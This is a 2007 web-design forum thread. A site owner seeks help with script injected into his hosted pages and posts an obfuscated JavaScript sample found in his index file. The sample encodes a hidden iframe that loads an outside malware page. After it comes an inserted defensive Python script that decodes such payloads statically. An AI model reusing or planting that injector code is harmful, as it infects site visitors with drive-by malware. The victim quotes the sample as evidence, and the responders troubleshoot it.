The Web Design Group

... Making the Web accessible to all.

> Virus linked to my websites...., I have a virus problem....
morbid1
post Jul 18 2007, 05:56 PM
Post #1


Newbie
*

Group: Members
Posts: 14
Joined: 18-July 07
Member No.: 3,368



I have done a lot of searching, but no answers, I hope this is the proper place to post this. I am not real sure, if it is not I apologize.
I have had hosting at the same company for 4-5 years now, not the best but usable anyway.
I really hope someone can help me as I have run out of ways to try and get rid of this problem, it is driving me insane, or should I say more insane!
I host probably 30-40 websites, most of which I have built and host for customers, I am not a great "coder" so I use Dreamweaver, I do design all of my sites and graphics in photoshop then load into dreamweaver then publish them to my host.
Recently when I go to some of my websites my antivirus pops up warning me there is a virus now collected from that website!
I contacted the host, they say it is my issue, deal with it.
I have no idea how to stop this or how to remove them, I have scanned in my servers, they found several viruses and supposedly removed them, but still I get these viruses from some of my sites homepages....
Can someone PLEASE, PLEASE tell me what to do to stop this asap! I am losing customers I am sure....
again, sorry if this post is in the wrong area, I did not know where else to turn for answers.
Thank you
DasMorbid1
pandy
post Jul 18 2007, 06:26 PM
Post #2


🌟Computer says no🌟
********

Group: WDG Moderators
Posts: 20,731
Joined: 9-August 06
Member No.: 6



So what virus did your AV say it was? Have you also scanned your local machine? There are viruses that inject script code in HTML files, so if you have uploaded new files, your own computer could be the source.

Do you have ads, counters or other things (except plain images) from outside sources on your sites?

morbid1
post Jul 19 2007, 05:55 PM
Post #3

Thank you 4 ur help,
AVG says it is a Trojan, I will look closer and write down exactly what it says this time, I need to re-boot in XP, Not showing it seems in Vista.....
No outside links on some of the sites, no ads, no "old scripts" as the host calls em....
Here are some of the urls if you want to try, I think what it does is want you to load active x etc...
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUSES ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
Now I am not showing anything on Vista, I will try XP again and see if any viruses still try to execute......


I rebooted in winxp pro, went to www.loc-cod.org and sure enough up popped AVG with: trojan horse downloader.... sysiuzx.exe virus detected etc....
Then it also had :
it found a problem with my temp files, loc-cod[1].htm ?
I am going to try and research further, but basically this is what all of them say that have this problem, trying to figure out where, loc-cod[1].htm comes from..... since it should be loc-cod.html.....



OK I have now boiled it down to this, basically they are saying somehow they are injecting malicious code to my webpages? how can I stop this, I am losing people everyday I believe because of this.
I found this out, it goes down to a virus, non malicious destroyer, js/psyme, and is talked about here at this link:
http://www.geeknewz.com/board/lofiversion/...x.php/t835.html

I really need to know how to get this stuff off my web pages and how not to allow this stuff to happen again, I have been free of problems like this on my host for 4-5 years now...
Thanks to all who can help.

This post has been edited by morbid1: Jul 19 2007, 06:30 PM
Brian Chandler
post Jul 20 2007, 12:27 AM
Post #4


Jocular coder
********

Group: Members
Posts: 2,460
Joined: 31-August 06
Member No.: 43



QUOTE
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUSES ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
Now I am not showing anything on Vista, I will try XP again and see if any viruses still try to execute......


Can't connect to the first two - the third (i-f.com) has nothing odd-looking in it. Probably some problem on your computer... what does "Vista" stand for? "Virus Incubation System, Try Again"?
Peter1968
post Jul 20 2007, 12:39 AM
Post #5


Serious Coder
*****

Group: Members
Posts: 448
Joined: 23-September 06
Member No.: 213



Wow, Brian you must be the last person on Earth who doesn't know what Vista is.

http://www.microsoft.com/windows/products/...ta/default.mspx

Now everyone knows what it is.

morbid1
post Jul 20 2007, 07:19 AM
Post #6

lol....should have said I was dual booting....
anyway ladies and gents, I cannot figure out how to get rid of it, when using Vista OS, It asks if I want to install RDS/ Something.... like an activex plug in....
I really need to get rid of this crud off my sites, how would I update all scripts etc... in my websites with Dreamweaver?
I keep being told by my host they can't do anything and it is not their problem, even if the virus was injected on their servers... 8(
Cannot figure out how this file loc-cod[1].htm is getting in my temp folder?

This post has been edited by morbid1: Jul 20 2007, 07:21 AM

morbid1
post Jul 20 2007, 09:02 AM
Post #7

I have finally downloaded the files from loc-cod.org, the code was actually in the index file itself! could not even open the file once downloaded, would not this be a leak in my host? how else can they just come in and put code in my index files?
Christian J
post Jul 20 2007, 05:45 PM
Post #8


.
********

Group: WDG Moderators
Posts: 9,656
Joined: 10-August 06
Member No.: 7



Sometimes AV-programs produce false alerts. Do other people get virus alerts on your sites?

You might check if your host has anything to do with this by uploading one of your sites to another temporary host. If you get virus alerts there too, your first host may not be to blame.

You could also try uploading a brand new test page to your old host from another computer, if you then get a virus alert the host is probably to blame.

morbid1
post Jul 21 2007, 07:04 AM
Post #9

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?

Brian Chandler
post Jul 21 2007, 07:22 AM
Post #10

QUOTE(morbid1 @ Jul 21 2007, 09:04 PM) *

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?


_What_ was "put into your index pages"? So far there is not a scrap of coherent evidence that anything was. Can you show us a listing of the part of your index part that includes this "injection"?

Otherwise it is vastly more likely that something funny is happening on _your_ computer. No-one here can really help you with that, because we don't have access to your computer.


morbid1
post Jul 21 2007, 05:32 PM
Post #11

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119';
s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116';
s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->
<!-- ImageReady Slices (new_enter_image.psd) -->
<div align="center">

Some of that code does not show up on my original index pages...
Any ideas on how this code is being automatically written to my webpages? must be some command file on the server, in my host area or wherever...
Can I put the html that is in my original index page on here, then put the code that is there when I upload it?
Not sure if that is allowed to put that code on here, sorry I am a novice at coding etc... I have Dreamweaver do the work usually....
Thanks again all who help, this is driving me and my host mad!
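
A static triage for the kind of script shown in the post above, added here as an example (it is not code from the thread): it compares the script blocks of a local original against the served copy and decodes the three-digit character codes as data, without running the script. The sample page, the `injected.example` address and all function names are constructed for illustration.

```python
import re

# "+=" or "+" followed by a quoted run of 3-digit decimal codes: s+='060047...'
CHUNK = re.compile(r"""\+=?\s*['"]((?:\d{3})+)['"]""")
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def decode_triplets(digits):
    """Decode 3-digit character codes as data; nothing is executed.
    Mirrors the loop in the posted script: codes above 191 get 848 added,
    which maps Windows-1251 Cyrillic byte values to Unicode code points.
    """
    codes = (int(digits[i:i + 3]) for i in range(0, len(digits) - 2, 3))
    return "".join(chr(c + 848 if c > 191 else c) for c in codes)

def added_scripts(local_html, served_html):
    """Script bodies present in the served copy but absent from the original."""
    known = {body.strip() for body in SCRIPT.findall(local_html)}
    return [b for b in SCRIPT.findall(served_html) if b.strip() not in known]

def triage(local_html, served_html):
    """Markup that each added fromCharCode/document.write script would emit."""
    findings = []
    for body in added_scripts(local_html, served_html):
        if "fromCharCode" in body and "document.write" in body:
            digits = "".join(CHUNK.findall(body))
            if digits:
                findings.append(decode_triplets(digits))
    return findings

# Constructed sample data, not the payload from the thread.
HIDDEN = '<iframe src="http://injected.example/" width=5 height=5></iframe>'
ENCODED = "".join("%03d" % ord(ch) for ch in HIDDEN)
LOCAL = ("<html><head><script>function MM_preloadImages(){}</script></head>"
         "<body><p>home</p></body></html>")
SERVED = LOCAL.replace(
    "<body>",
    "<body><!-- o65 --><script language='JavaScript'>function nbsp(){var s='';"
    "s+='%s';s=s+'%s';/* decode loop elided */"
    "document.write(String.fromCharCode(t));}nbsp();</script><!-- c65 -->"
    % (ENCODED[:60], ENCODED[60:]),
)

if __name__ == "__main__":
    for markup in triage(LOCAL, SERVED):
        print("served copy would write:", markup)
```
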
morbid1
post Jul 22 2007, 10:15 AM
Post #12





no 1? 8(

morbid1
post Jul 22 2007, 11:35 AM
Post #13

Here is a screenshot of the warning I get when going to several of my websites now: [attached image]

Christian J
post Jul 22 2007, 04:52 PM
Post #14

That code might be inserted into the HTML file from your own computer (during file transfer?) or from the server (possibly through a rootkit, which is hard to detect). Try my ideas above to make sure which it is.


Brian Chandler
post Jul 22 2007, 10:59 PM
Post #15

QUOTE

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

... <snip>



OK, well, help by saying _exactly_ where you found this. If this appears at the head of a page, and you didn't put it there, you need to ask someone else to download the same page and see if the junk appears to them too. Then you know whether the problem is your computer or the server.


morbid1
post Jul 23 2007, 07:47 AM
Post #16

I have re-uploaded several index.html pages, only a few ended up with this code being written to them, and also these are brand new Operating systems, Clean installs....

Christian J
post Jul 23 2007, 10:44 AM
Post #17

I recall seeing something like the above javascript when I first looked at one of the linked pages, so it's definitely present online occasionally.

What I'm wondering is if the files got infected by your computer (even if they look clean offline) or by the server. When you say your OSs are clean installs, haven't you moved any files or programs to those computers from the first one (HTML files, Dreamweaver, etc)?

morbid1
post Jul 23 2007, 03:30 PM
Post #18

clean installs, new installs of dreamweaver etc... the backups of my websites are on another drive, move one of them after they are looked at thoroughly, upload it and boom, there it was again, and only happens on some of the index pages I uploaded. I now have found an index page that had 30-50 advertisement links that I never had there, I saved a copy of it, uploaded a new index page and its ok for now, but somehow these people are getting into my servers, has to be.
Darin McGrew
post Jul 24 2007, 11:25 AM
Post #19


WDG Member
********

Group: Root Admin
Posts: 8,365
Joined: 4-August 06
From: Mountain View, CA
Member No.: 3



When was the last time you changed your password?

morbid1
post Jul 24 2007, 03:30 PM
Post #20

I have been changing them every day now until a solution is found.
I now have this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, shouldn't do that when it was an HTML page that was there.
I think someone has gotten in from my forums and has run a PHP script to do this damage.
You can see that error here,
www.loc-jk2.com
that is where I simply deleted my index.html file.